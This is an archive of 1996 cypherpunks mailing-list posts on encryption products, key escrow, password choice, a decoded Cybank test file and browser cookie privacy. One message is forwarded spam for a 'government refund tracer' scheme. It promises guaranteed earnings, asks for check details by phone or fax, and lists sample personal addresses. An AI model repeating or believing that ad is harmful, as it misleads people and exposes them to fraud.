But, on the other hand, it wouldn't be to hard to have the user set both
keys (yeah, so that didn't actually say anything, so what...), and then do
an every-other-byte type thing (although that would be slow... every other
block would be more efficient), and have 2 EFS's in one file, and make it
so that on the "duress" one the extra space appears to be "free".

One could make it a real file system, and add a fake disk error to prevent
over-writing of the "non-duress" filesystem.

> 
> ------------------------------------------------------------------------- 
> |Just as the strength of the Internet is  |Mark Aldrich                 |
> |chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
> |depends upon the chaos and cacophony of  |maldrich@grci.com            |
> |the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
> |protects - District Judge Stewart Dalzell|                             |
> |_______________________________________________________________________|
> |The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
> |    The opinions expressed herein are strictly those of the author     |
> |         and my employer gets no credit for them whatsoever.           |
> -------------------------------------------------------------------------
> 

This will sound odd, but did you know that "dockmaster" was the name of
the NSA's first unclassified computer? just wondering.... ;)

 --Deviant



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMetbfTAJap8fyDMVAQGN7Af+Jck2zofxtJOBLuceEhGmaZwoodxGHITb
PrdLwsrYVdWbyzhtmCy9iDm0cMh0BW6dRGXDQWml4Ed0ObAPBwQz4wwpbS+4OOBS
VSsTQ+A5JctbxeaA24XPPCbVOLrCCFaWiNZacSft/hUPDn4etYPKwtVDFfFsKtWF
VohL28TyLAskNUFarKKr1YFVAlZ632XZy9xEDXnNi7lDwj5cSHtCL89Kt0F8qSiq
6Qz+cfWmwpx4Pv/CyenTUHu+Q6orgxSGIY7hBGywcUzm4lRKmOJrzFjqjM3Af4dQ
78lasplnScvu2Pw6ofCxFBHpf0r4DH/XdeKH0BzKoQnBlu8X4bjg0A==
=/T4e
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 17 Jul 1996 23:17:56 +0800
To: cypherpunks@toad.com
Subject: Re: Surf-filter lists
In-Reply-To: <199607160541.BAA11900@yakko.cs.wmich.edu>
Message-ID: <v03007601ae116d0e0e8e@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 PM -0700 7/15/96, Damaged Justice wrote:
>Vlad: How can consumers make an informed decision as to which filter
>they wish to purchase, if they are not told exactly what information
>each product is filtering out?
>
>Meeks et al may be guilty of flamboyant, emotionalistic prose, but I
>find the concept that the public is expected to buy various filters
>without knowing what they filter...frankly, ridiculous.

YOU and I may find it so, but you simply don't understand the mentality of
those who will buy such filters without question. Vast numbers of people
take the word of their minister, government, morality "guide", guru, or
teacher without question. Why do you think Scientology has gone as far as
it has?

You don't think all those people who used the various blacklists circulated
during the McCarthy era demanded original source documents, do you?  I'm
not comparing those who desire a "clean" computer environment in their
homes with McCarthyites--I'm referring to the mental process of accepting
certain kinds of "authority" without question--especially when it wraps
itself in righteousness.

We try to teach people (at least in the better schools) to question, and
find out for themselves, but a lamentably small proportion do.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Tue, 16 Jul 1996 20:53:24 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Word lists for passphrases
In-Reply-To: <v03007605ae102f6372e6@[192.187.162.15]>
Message-ID: <199607160727.JAA27015@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| It is pretty easy to defend against dictionary attacks by using an expanded
| character set--mixed caps and lower case; numbers substituted for some
| letters according to easily-remembered personal rules.
| 
| "Da5id" in "Snow Crash" by Neal Stephenson is an obvious example, since the
| "v" is a roman numeral 5. Another is the "Compuserve method" of inserting
| punctuation characters between words making up a password or key. Since the
| length of the words used is unknown to the cracker, this makes his job
| harder.

You should on the other hand be able to use the username as an indicator
of what kind of password it is;
user "warez" / pass "warez" (but better check the home directory for MS Word)
user "l0pht" / pass "'l33t"
user "feh" / pass "uk4n+r3dt13" (look for zines)

Actually, these kids believe the language they use are hiding them, but I
bet that the letter digrams they present is a immediate marker of "H4k3rz".
It's definitively better than searching for normal "elite, hacker, phracker,
exploit". I just used "l33t" (52), "d00d" (742), "h4qu3r" (5), "sux" (4053)
on AltaVista, to name a few.

-cwe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Wed, 17 Jul 1996 22:35:32 +0800
To: cypherpunks@toad.com
Subject: Re: Seek-and-Destroy
In-Reply-To: <v01510100ae100d6e192f@[204.62.128.229]>
Message-ID: <v03007803ae1175ad68a2@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


I found it interesting that the "explanation" web page,
	http://xxx.lanl.gov/RobotsBeware.html
contains an image of StarTrek's "Data." Since this likely to be
a copyrighted image, I certainly hope that xxx.lanl.gov has a license
from the StarTrek organization for republication.

It would be a terrible thing indeed if such a well-respected government
organization were to violate the law.

Cheers.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Jul 1996 16:04:47 +0800
To: jsw@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EB61E5.520E@netscape.com>
Message-ID: <199607161346.JAA07227@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   If you are not comfortable providing this information, then you
> may either run the export version, or purchase the retail navigator
> package, which also includes the US only version when sold in the US.

But you can't buy the Linux or other similar versions, so this is not
an option for many of us.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Wed, 17 Jul 1996 16:02:20 +0800
To: Timothy Lawrence Nali <tn0s+@andrew.cmu.edu>
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
In-Reply-To: <Pine.OSF.3.91.960714123249.32693A-100000@giasdl01.vsnl.net.in>
Message-ID: <96Jul16.105830edt.20481@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <oluAERy00iWTQ0u2Zy@andrew.cmu.edu>, Timothy Lawrence Nali <tn0s+@andrew.cmu.edu> writes:

    > Excerpts from internet.cypherpunks: 14-Jul-96 Re: ANNOUNCEMENT: PGPfone
    > B.. by Arun Mehta@giasdl01.vsnl 
    >> Thanks for the input.
    >> 
    >> Is UDP used for other purposes not related to voice that I might pretend 
    >> to be doing? Or is there still some way of fooling them?

    > One thing that comes to mind are network games.  I not sure if Doom or
    > Quake can use UDP, but I'm fairly certain that Netrek uses UDP packets
    > (up to 16 players run client programs which communicate with a game
    > server using TCP or UDP).

Hmm... This looks like a _really_ good place for stego.  Granted, you
might get a significant slow down, but it might be worth it depending
on your needs.

-Robin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 17 Jul 1996 20:37:57 +0800
To: JonWienk@ix.netcom.com
Subject: Re: PGP 3.0 / Windows
In-Reply-To: <199607160545.WAA01000@dfw-ix10.ix.netcom.com>
Message-ID: <199607161529.LAA14171@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Has anyone heard anythong about PGP 3.0?  Is it still due Real Soon
> Now?  Or might it be worthwhile to break out VC++ and do a port as a
> cpunks cooperative project?

As I've said, there is no PGP 3.0, there is only PGPlib.

We're trying to finish it as quickly as possible.  There are only a
few more functions that are required; we just need to make sure the
API is extensible enough to handle the new features we want to add
later.  As for the current status, I've started using the message
processing application for my every-day encryption/decryption.  It
works fairly well (there are a few weird states that still need to be
worked out).  I'm still working on the key management application, so
that isn't nearly as 'ready' to be seen.

Qustion: what do you want to "port"?  PGP 2.6.2?  You're joking,
right?  Do you know how difficult that would be?  Not to mention that
you'd never get a Windows look to it because of all the printf()'s
throughout the sucker.

We're doing the best that we can to get PGPlib finished.  But the more
people who send email asking "when is it going to be finished" the
less time we have to actually finish it (since we have to spend
precious time answering the email).

I hope this answers your question(s).

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Wed, 17 Jul 1996 22:19:37 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Symantec's Your Eyes Only
Message-ID: <AE113435-F4543@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


If you read this weeks "Network Computing", there is a report on Symantec's
Your Eyes Only encryption software for Windoze 95.  The article can be
found at: http://techweb.cmp.com:80/techweb/nc/711/711sneak2.html.  Looks
like a PGP competitor - uses RSA public key, DES, triple-DES, RC4, RC4 or
blowfish secret key algorithms.  It can also be used to encrypt directories
on the hard-drive while retaining the ability to use them.

This appears aimed at corporate users, and includes a "super-user" access
to all encrypted files/messages.  Also includes the capability to create an
"unlock" disk that will decrypt everything should you lose your password.

Now my $.02.  I am concerned about the lack of a distinction between
transient communications and stored data.  This is apparent in the GAK
proposals, but is also increasingly apparent in mainstream corporate
products such as this one and ViaCrypt BE.  It is apparent (to me anyway)
that corporate access to stored data (data owned by the company, on
machines owned by the company) is probably necessary.  I do not see this
same need for access to transient communications.  Am I way off base on
this one?

	Clay

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 17 Jul 1996 22:58:00 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Banning Anonymity As Well (was Re: How I Would Ban Strong Crypto
Message-ID: <199607161705.NAA19016@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Jul 96 at 11:53, Bill Frantz wrote:
[..]
> I still think this whole GAK thing is going to fail on the, "Which
> government?" question.  I don't see either multi-nationals or their
> governments wanting to share their secrets with each other, and I don't see
> how to set up universal GAK to prevent that form of industrial espionage. 
> Also, the key which decodes the GAKed data is just too valuable and too
> easy to steal.

Assuming the info is encrypted with one GAK key, yes.  There might be 
a series of keys, perhaps for each escrow agency, or an id-number 
that identifies the key.

Note that such methods will not allow much anonymitiy, since each 
communication must be escrowed.  The method used to id. the key can 
be used to trace a sender or receiver's id.


Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyal Collins <lyalc@ozemail.com.au>
Date: Wed, 17 Jul 1996 01:10:14 +0800
To: emedia@bned.design.net.au
Subject: Re: FYI: Cybank
In-Reply-To: <199607151154.VAA16581@bned.design.net.au>
Message-ID: <31EC5EA1.1D45@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


To clarify my earlier post :
Up until anbout 29 May, 1996, the Cybank site
had a "test" file that was placed as a challenge.
As there was a challenge, I took it.
The following describes the data I was able to 
recover from the test file.

I have received a number of files asking
how I had hacked the Cybank server. I have acheived
no such feat, merely determining the
methodology used at the Cybank site.
I communicated that fact to Cybank's operators,
who subsequently seemto have altered their
site, and download client.

Taking this issue any further has no interest
to me, and I am unable to post any
VB source code - I "cleaned" some hard 
disk space, and have deleted the working files
I used at the time. Silly me.

Also, the Cybank site seems to have changed, so I don't
know how you would get a test fle without becoming a 
Cybank user, which would probably mean passing your name,
credit card etc to them.

At the time, Cybank seemed very happy with actual user testing,
however, I have had little further contact (1-2 emails).

Lyal

ps - i have also learned some interesting spelling 
methods as a result of informative emails. 
-- 
All mistakes in this message belong to me - you should not use them!



*******************************************
included text from previous emails.
*******************************************

On Wed, 29 May 1996 12:20:08 Cybank wrote:

> >Return-Path: lyalc@ozemail.com.au
> >Date: Tue, 28 May 1996 23:55:21 -0700
> >From: Lyal Collins <lyalc@ozemail.com.au>
> >To: info@oxford.com.au
> >Subject: The text in the "securely encrypted" test message
> >X-UIDL: 833321608.007
> >
> >According to me, this decodes to :
> >Text1!O1! 12!O2!I1!830304962394!I2!A1!0.10!A2!P1!!P2!C1!0.10!C2
> >Text1                = data to follow is text ?
> >!O1! 12!O2   = I don't understand these bits yet
> >!I1!                 = a common delimiter  - 1 = start
> >830304962394 = serial number that this 10 cents is for/from
> >!I2!                 = a common delimiter  - 2 = end
> >A1!0.10!A2!  = ammount is 10 cents, $0.10
> >P1!!P2!              = seems to be a token of some kind
> >C1!0.10!C2   = a check value to ensure amount is correct.
> >

well done Lyal!

not bad so far but you've missed a few things  :-)

presume that you've used a VB3.0 decompiler to do it

but we're upgrading to VB4.0 and changing the encryption process

very soon :-)

where are you?

your prize might well be a job!!!!!!

:-)

plus the whole cash environment is becoming server-based
within a couple of weeks.

stay in touch, we need a beta-tester!

Martin Haynes
Oxford Media Group Pty Ltd
CYBANK





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: t byfield <tbyfield@panix.com>
Date: Thu, 18 Jul 1996 11:43:22 +0800
To: cypherpunks@toad.com
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <v02120d03ae10e4a442cf@[192.0.2.1]>
Message-ID: <v03007803ae11071ca328@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 AM -0700 on 7/16/96, Lucky Green quoted/wrote:

> >    Your straining my credulity to claim that you can't get ahold of the
> >regular phone number of them.   Come on, are you 7 years old?
>
> How do you get a hold of the phone number if you don't know the location of
> the company, they aren't on the net, and don't have the US phone numbers
> CD-ROM handy? I am 33 and have yet to figure this one out...

	Try getting anything done from outside the country, where WATS lines
need not apply, thank you, even if you _do_ have your CDRs with you. The
amount of effort it takes to get around those %#$*ing 800 numbers from
outside the US is a nontrivial component in US companies losing business to
foreign competitors, imo.

	ObCrypto: non-net communications channels will necessarily play a big
part in any systematic effort among the G7+ to establish a transnational
GAK regime, and prickly details like disparities/imbalances in phone
systems will wreak havoc on a practical level. In fact, the
politico-economic dynamics that distort international telecom arrangements
will probably go a long way toward hobbling the "widening horizons of
police cooperation" the TLAs are aiming at. Then again, maybe the only
thing worse than international GAK might be an incompetently bureaucratized
international GAK system.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Creative Financial Alternatives" <homebiz@flock.mwci.net>
Date: Thu, 18 Jul 1996 02:37:38 +0800
To: homebiz@flock.mwci.net
Subject: Government: Home-Business
Message-ID: <199607160811.EAA00698@smtp1.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend,

Thank you for your interest. Please take a minute to read this 
important information or simply print it out.  

All the information here is 100% accurate and can be verified
with the Department of HUD in Washington D.C.

***************************************************************
   Honest Home-Business NO MLM or SELLING involved
       Earn $500 to $1,000 per week guaranteed.
***************************************************************

***************************************************************
 NOW YOU CAN MAKE UP TO $1,000.00 A WEEK OR MORE, IN
 YOUR SPARE TIME WORKING  AT HOME AND HELPING THE
 GOVERNMENT FIND PEOPLE WHO THEY OWE MONEY TO!
***************************************************************
 You'll be your own boss.  Work when you want... as much as you
want. Sound Good?  Then, read on because it gets a whole lot better!!


 Dear Friend,

    The truth is, the US Government really does have money to give
away.   In fact, right now there is more than $70,000,000.00 that
legally belongs to millions of unsuspecting US citizens.

    Where does this money come from? When the US Department
of Housing and Urban Development (HUD) and the Federal Housing
Administration (FHA)  approve a loan for a house, 1/2 of one percent
of the loan amount is added by HUD/FHA to the loan interest as
insurance in the event that the borrower does not pay the mortgage.
That money accumulates interest over the life of the loan. If the house
is taken away from the borrower through foreclosure, that money is
forfeited. However, when the borrower pays off the loan, they are
entitled to a full refund of that money. Over 20-30 years, that can add
up to a substantial amount of money!!

     So what does this mean for you? EASY MONEY!! I'll explain.

Most people do not know that this amount is due to them- many
have relocated. Since HUD/FHA doesn't have the resources to
track down each and everyone of the borrowers due a refund, they
developed the Refund Tracer Program for the purpose of allowing
people, just like you, to earn money by locating borrowers.

You see, thanks to the little known Mortgage Refund Tracer Program,
you can easily perform a valuable service. As a Refund Tracer, you
can help return millions of dollars to rightful owners and collect part
of what you return in processing fees.

     Just think of it!!

     A fantastic opportunity to earn substantial amounts of money. You
can start right away and earn $300 to $1,000.00 a week or more, right
from your own home. There is really no limit what you can earn. It's up
to you how much you want to work.

     You can be young or old, male or female, single or married,
employed or unemployed. It doesn't matter.

A WIN/WIN/WIN SITUATION!

     The government wins since the money must be refunded to it's
rightful owners.  The borrower wins because he or she receives
money the borrower is entitled to. You win because you receive a
generous processing fee. Everybody wins!

NO EXPERIENCE NEEDED

     The good news is that you don't need experience, or special
training. In fact, if you can read, write, and follow simple
step-by step instructions, you can earn lots of money in this
business.

     That's where the REFUND TRACER PROGRAM MANUAL
comes in. It explains everything you need to know. It is a step-by-step
instruction manual that will show you secrets that will allow you to
start receiving cash payments quickly. Nothing will be left unanswered,
and once you have the manual, you will not have to purchase anything
else from us.

     Here's an example of what you'll get...

* An information-packed manual with easy to follow instructions.
* All government forms provided by HUD/FHA
* Sample letters needed to inform borrowers that you are a Refund
   Tracer and are willing to help them get what is due to them. Plus,
   all other letters you will be sending during the processing time
   period.
* A FREE STATE Listing for any STATE.
* You'll also have our technical support along the way. 
* SPECIAL BONUS " Personal Complete Guide to the Internet".
   This is a 175 page 15 Chapter E-Book that covers the whole Internet
   and it is yours FREE when you order our program within the next
   10 days.

     Here's some of what you'll learn...

* How to obtain names of people due mortgage refunds from HUD
* The easiest ways to locate those due a refund
* How to contact them to get an immediate response
* How to process the necessary forms so that refunds are promptly
  issued
* How to claim your share of their Government refund
   ...and much more!

     You can get started immediately without any special
training or education and our manual will show you how. You will
be able to start making money almost at once. You can get
started on a shoestring!!

     You will be amazed at how easy it is. Imagine, earning
hundreds....even thousands of dollars each week helping the
government refund money. It will give you a good feeling just knowing
you are helping people receive money they didn't know they had
coming. You'll be getting paid for doing it!

     In 1986, Congress mandated that HUD make available to the
general public lists of borrowers who were due refunds. We investigated
and discovered one of "The Best Kept Money-Making Secrets
In America". When I learned of the little-known Refund Tracer Program,
We knew it was just what we had been looking for.

     This is probably the easiest, 100% legitimate, way to make money
from scratch ever!

     You will find that...

The fastest and best way to make a HUGE amount of money quickly
is to trace people who have MILLIONS of DOLLARS in refunds due to
them and then claim YOUR SHARE in Processing Fees.

     As long as HUD/FHA continues to approve loans, the money will
never stop growing. Your money- making potential is endless! Every
month, thousands of names become available for processing, names
that are available for you to earn cash by helping borrowers receive
their government refunds.

WHAT COULD BE EASIER?

     Now just ask yourself, what message is more powerful than telling
someone that you are going to help them receive a substantial sum of
money that they didn't know they had coming? Believe us, they will
love you for it, and will be more than happy to pay your fee. But this
is only part of what makes this program so easy to use. Our manual
will make it even easier for you to get started earning CASH RIGHT
NOW!

THE ULTIMATE WORK-AT-HOME MONEY-MAKER!!

     We know what you're thinking (it sounds too good to be true). But
believe us, it is 100% true and completely legitimate. Imagine a
money-making program that was established by the government.
You can do this right at your kitchen table, or if you have a computer
your even one step ahead. Let your computer start helping you make
some money, instead of costing you money!

     The Refund Tracer Program is recognized as an extension of the
services provided by HUD/FHA. This program is a gratifying way to
earn extra money, especially since you are also helping someone
else at the same time.

     The work you will be doing is simple, pleasant and absolutely
anyone can do it! Without any formal training or education, Refund
Tracers who have just started are earning $300 to $1,000 or more a
week! It depends on your determination, and how much you want
to make!  If you have any additional questions for us feel free to call 
us at: 216-226-8799.


     Please don't delay. The only way you can lose is doing
nothing, and that would be a shame. You owe it to yourself 
and your family. So act now. You'll be glad you did!  We give you 
everything you need to get started right away, including a FREE 
state listing Nobody can even come close to matching this offer.  
Other people sell you the Manual then charge extra for the State 
Listing, not us.  We give you the whole business for almost nothing.  

     For a small amount, you can take a big step towards financial
independence. We're looking forward to hearing from you!
Plus, if you order the program we will personally assist
you with any ideas or questions you may have while
working the program,  so your not alone in this. We'll be
here to help you along you're way

           Below is an example of the State Listings.
        ----------------------------------------------
Name            Address & City   Case# & Zip  Date & Money owed
-------------------------------------------------------------
Smith, Joe      1626 Ansel Drive        441-024360  07/06/94
                       Dayton                        OH 45416   $1,800.00
Virgil Baker    804 10th Avenue         411-031524  03/01/95
                       Middletown                 OH 45042   $1,134.76
-------------------------------------------------------------------------

As you can see you are provided with quite a bit of information. This
is what make the program so EASY to work!!!

********** 90 DAY MONEY BACK GUARANTEE **************
Here's how our policy works all you have to do is try the program for
90 days then if your not satisfied simply return it for a refund. So you 
have nothing to lose. If your looking for a real opportunity you
found it.

Respectfully yours,

Creative Financial Alternatives

The Program Only Costs $33.95

Send payment to:

Creative Financial Alternatives
Unclaimed Funds
18645 Detroit Ave. 
Suite 714
Lakewood, Ohio
44107

We accept Money Order or Check Made Payable 
to: Creative Financial Alternatives

We are pleased to announce were able to accept checks by phone or
fax to help you get started immediately. If you want to get started 
right away. The purpose of accepting checks by phone and fax is 
that it speeds up the process so you can get started immediately.

Phone us at: 1-216-226-8799 

Fax your check to: 1-216-226-3225 

* Please note that if you do check by phone or fax you will need to
keep that specific check for your own records. Please do not mail it
to us or deposit it at your bank. Simply void it out and keep it for your 
own records.

*************  QUESTIONS & ANSWERS  *****************

You are bound to have some questions about the Government
Refund Tracer Program. Below are some commonly asked questions
and my straightforward answers.  Also, if you have any questions that
aren't answered below please call us at:  216-226-8799
We'll be glad to answer them for you.

Q: Is the Government Refund Tracer Program legal?
A: Yes, in 1986 Congress mandated that HUD make available to
the general public lists of borrowers due refunds. Subsequently,
HUD created the Tracer Program.

Q: Can I do this from any state?	
A: Yes, you can live in one state and trace people in another state,
you can do it from anywhere!	

Q: How much does the Tracer receive?	
A: We recommend 25%-30%, of the refund. 	

Q: How do I obtain the names of the refund recipients?
A: You can get them directly from HUD or us.

Q: Why can't the person owed a refund get the
money for themselves?
A: They can, however the vast majority of people don't
know anything about the Government refund process.
They would need a case number and other specific
information only you have. This lack of knowledge is what
makes the tracer so valuable, because they can't do it without
you.

Q: Does this program require a large investment?
A: No, expenses (such as lists of names, stamps,etc.) will
depend on how large an area you intend to cover and since
you will be self-employed these expenses will be tax-deductible.
Most of your investment will be your time and effort.

Q: What is the average refund amount?
A: The average refund amounts range from $800-$1,000, but
refunds of $4,000 are not unheard of. It all depends on
the area or state you target.

Q: If I did a refund for $1,130.94 how much would I get?
A: Your fee is 30% so you would get $339.28 for that one claim!!

Q: How do I find these people?
A: You can go through the phone book directory or if you have a
computer with a CD-ROM drive you can purchase a copy of
"Home Phone" it's a directory of over 85 million residential
phone numbers. The majority of these people are still at the
current addresses on the form from HUD.

Thank you very much and we look forward to talking with you in the near 
future.  

                      Creative Financial Alternatives
                       18645 Detroit Ave. Suite 714
  `\|||/                    Lakewood, Ohio 44107
   (o o)        Phone: 216-226-8799     Fax: 216-226-3225
ooO_(_)_Ooo________________________________________________
_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|
_____|__ __|_____|_____|_____|_____|_____|_____|_____|_____|
_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 18 Jul 1996 05:53:49 +0800
To: sameer <tomw@netscape.com (Tom Weinstein)
Subject: Re: US versions of Netscape now available
Message-ID: <2.2.32.19960716103638.00835c08@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:18 PM 7/15/96 -0700, sameer wrote:

>	Not like that's tough to figure out. Congrats. It's cool to
>actually be able to connect to my webserver using real encryption.
>Glad the lawyers don't think Barksdale is going to jail anymore.

I'm glad too.  So how many minutes did it take to leak overseas?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 18 Jul 1996 09:29:44 +0800
To: Christopher Hull <cypherpunks@toad.com>
Subject: Re: CookieScan 0.0 rev 0
In-Reply-To: <199607152332.QAA14438@apple.com>
Message-ID: <v03007600ae115f39ce9b@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:34 PM -0700 7/15/96, Christopher Hull wrote:
>Do y'all think there might be an interest in a
>utility which would allow the user to deal with
>browser cookies?
>
>What I imagine is a little utility that would
>display the cookies stashed on a machine and
>give the user the option to either delete or
><snicker> edit </snicker> any given cookie.
>(Hey, it's *your* computer, not the website's).

And they'll simply <snicker> start encrypting the cookies if they don't do
so already. Have a nice day.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 18 Jul 1996 01:14:54 +0800
To: cypherpunks@toad.com
Subject: Cookie alternatives
Message-ID: <199607161607.JAA08875@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been quite a bit of discussion recently about the "cookies"
used by Netscape Navigator and their effects on privacy of users.  Here
is some background and some thoughts on alternatives.

I think the term "cookie" goes back to the 1960's.  According to
legend, there was a virus-like program called "cookie monster" which
would occasionally pop up on people's terminals and say "gimme
cookie".  You then had to type the word "cookie" to satisfy the
program, and it would go away.  The program was hidden in the core
memory of the large, multi-user computer systems which were common in
those days.

I first heard "cookie" used similarly to its current context in the
1970's.  It referred to a data item which would be given by a service
to a client of that service, and which would be used on later
interactions.  I think the usage comes from the cookie monster, where
you imagine the client saying "gimme cookie" to the server.  The cookie
is an "opaque" data item, that is, its structure if any is not visible
or documented for the client.  It has meaning only to the service.

There is a similar concept in cryptography, the "nonce".  A nonce is a
random value which is generated by one party in a cryptographic
protocol and which is exchanged at later stages of the protocol.  The
purpose of the nonce is to prevent replay attacks and to maintain
continuity during the (possibly) many exchanges of data which make up
the protocol.  When the client sends a request to a service it includes
a nonce, and the return reply includes the same nonce.  This way the
client can make sure that this is a reply to its current request and
not something which is replayed from an earlier interaction.

Cookies seem a little more general than nonces, in that nonces are
pretty clearly supposed to be just random numbers, while cookies are
more general and could have internal structure which is known by one of
the parties, although it is usually opaque to the other.

However I think in current usage on the web cookies are most commonly
used basically as nonces, random values whose purpose is to maintain
continuity in a series of interactions.  When a server gives a cookie
to a web browser, that browser supplies the cookie on future
interactions with the server.  The cookie probably does not have any
specific data about the user or the interaction, but is used only to
link up the interactions which take place.  It is most probably used as
an index into a database maintained on the server itself.  Its only
requirements for this purpose are that it is unique and that it can
easily be used as such an index.

One typical usage would be to maintain a "shopping cart" while browsing
at a store.  If I am visiting an online clothing store, I may choose to
buy some pants, a shirt, and a jacket as I browse around.  Each time I
click on the "buy" button, my browser includes the cookie I received
when I first visited the site.  This indexes into a database on the
server which is keeping track of what I have bought.  With each new
item, the cookie allows the server to add it to the correct virtual
shopping cart.  Then when I "check out", again the cookie allows the
server to display everything I bought.

Given that cookies generally work this way it is clear that the notion
of editing cookies doesn't make much sense.  If cookies are opaque data
structures, changing them is just going to make them invalid.  You
might as well just delete them.  This also implies that you don't have
much control over what kinds of information the server is maintaining
in its database which is indexed by your cookie.  In the shopping cart
example, the cookie is sent on every transaction, not just when you
click to make a purchase.  This will allow the server to track your
progress through the site, see which if any ads you have seen, and
generally record many details about your interactions.  More generally,
cookies are used for this purpose even on sites which do not need them
for shopping carts.

As a user of the web, I would prefer to have more control over the kind
of information which servers gather about my browsing habits.  Of
course, since web interactions are voluntary, a server is free to put
whatever restrictions it wishes on clients in return for letting them
access its information.  It can require clients to accept cookies, to
register with their names and addresses, or to FedEx their firstborn
children to the store, for that matter.  Nevertheless to the extent
that I have bargaining clout in these interactions, I will prefer
systems which do not infringe so much upon my privacy.

It is interesting to consider how shopping carts might be done without
cookies and similar technologies which allow servers to get more
information about me than necessary.  I would prefer a system where the
list of things I have chosen to buy is saved on my own computer, in a
format I can clearly see, and without linking my purchase decisions to
other browsing I may have done on that site.

Consider a system where when I click on "buy", a dialog box pops up in
the corner of my screen which is my virtual shopping cart.  It holds a
list of the items I have selected for purchase, with each new item
appended to the list.  When I go to check out, the contents of this
dialog box are uploaded (with my permission) to the site, where payment
arrangements are made.  Since I can see what is being put into the
dialog box and what is being uploaded, I know that I am controlling
exactly what information is being revealed about me.  I don't have to
trust the server to protect my privacy by not recording excessive
information about my browsing.

(Given the difficulties in creating new protocols for this kind of
support, I think a step in the right direction would be to change the
user interface so that cookies are only sent upon user request.  Maybe
you have to shift-click or use some other key modifier to send a cookie.
Then shopping pages could ask you to shift-click the buy button to add
the item to your shopping cart.)

All this is in accord with the general principle that we support here,
of protecting privacy by limiting the collection of infringing data,
rather than trying to pass laws to restrict the dissemination and
sharing of such information.  We support ecash since it allows
transactions without identification, rather than using credit cards but
trying to put legal restrictions on what the CC companies can do with
their transaction data.  Cookies allow many kinds of privacy infringing
data to be collected.  I would prefer to see alternate mechanisms to
allow for the kinds of transactions that cookies are needed for, which
allow users to protect their own privacy.  Are there other uses of
cookies for which alternatives are needed?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 18 Jul 1996 02:11:33 +0800
To: cypherpunks@toad.com
Subject: Re: DCSB: Betting on the Future
In-Reply-To: <v01540b01ae10aef56be8@[156.80.2.176]>
Message-ID: <v03007623ae11405cb3d1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM -0400 7/15/96, Charley Sparks wrote:
> If I can't wear a V2 PGP T shirt It ain't good enuf to attend...

Thank you for your input.

>cheap
>lunch too

In light of the following .sig, I hope I'm forgiven if I'm caught
repressing a giggle or two...

>                       Charles E. Sparks
>                     Booz Allen & Hamilton
                      ^^^^^^^^^^^^^^^^^^^^^
>          http://www.clark.net/pub/charley/index.htm
>            In God we trust, All Others we encrypt
